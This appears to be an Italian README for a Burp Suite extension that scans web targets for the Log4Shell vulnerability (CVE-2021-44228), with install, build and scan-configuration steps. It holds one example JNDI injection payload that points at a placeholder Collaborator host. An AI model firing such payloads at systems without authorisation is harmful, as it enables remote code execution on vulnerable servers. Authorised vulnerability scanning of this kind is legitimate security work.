Estensione Burp per scansionare la vulnerabilità Log4Shell (CVE-2021-44228) con payload personalizzati.
Disclaimer
Non sono responsabile per le tue azioni, il freeze di burp-suite, l'hacking del target, una guerra termonucleare o l'attuale crisi economica causata dal seguire queste istruzioni. TU stai scegliendo di usare questo strumento, e se mi punterai il dito contro per aver pasticciato qualcosa, riderò di te.

Istruzioni:
- Installa l'estensione dai rilasci precompilati o compila dal sorgente.
- Disabilita/deseleziona tutte le altre estensioni di scansione attive come active scan++, burp bounty pro, param-miner ecc.
- Dal menu in alto apri le impostazioni di Log4J Scanner.
- Aggiungi il tuo payload personalizzato e salva le impostazioni.
- Seleziona il target > tasto destro > Scan.
- Seleziona
Scan Configuration > Select from library
- Seleziona solo
Audit checks - extensions only e premi OK.
Un ringraziamento speciale a Silent Signal, le istruzioni e le configurazioni di scansione sono ispirate alla sua estensione.
Istruzioni importanti da ricordare:
- Nel tuo payload personalizzato NON aggiungere l'url del tuo collaborator, aggiungi solo
[collaborator-server] come segnaposto,
[collaborator-server] verrà sostituito dall'url del tuo server collaborator.
- Esempio di payload:
"${jndi:ldap://[collaborator-server]/a}
Scarica i rilasci
https://github.com/0xDexter0us/Log4J-Scanner/releases/
Compila dal sorgente
./gradlew build fatJar
- Prendi il file jar
build/libs/Log4J-Scanner-x.x.x.jar
Installazione
- Scarica l'ultimo jar dai rilasci o compila dal sorgente.
- Aggiungi il jar a Burp Suite.
Se ti piace il progetto, per favore lascia una stella al repo! <3
Risorse
- Per scansione passiva:
https://github.com/f0ng/log4j2burpscanner
- Per scansione attiva:
https://github.com/albinowax/ActiveScanPlusPlus & https://github.com/silentsignal/burp-log4shell
Changelog
25 dicembre 2021 - v0.2.0
- Aggiunta API Burp Collaborator.
- Rimosso scanner personalizzato.
- Aggiunta API scanner Burp.
13 dicembre 2021 - v0.1.0
Ringraziamenti
Questo è stato codificato da me in un giorno ed è una release iniziale, potrebbero esserci bug, segnalazioni di bug, suggerimenti e pull request sono tutti i benvenuti :)

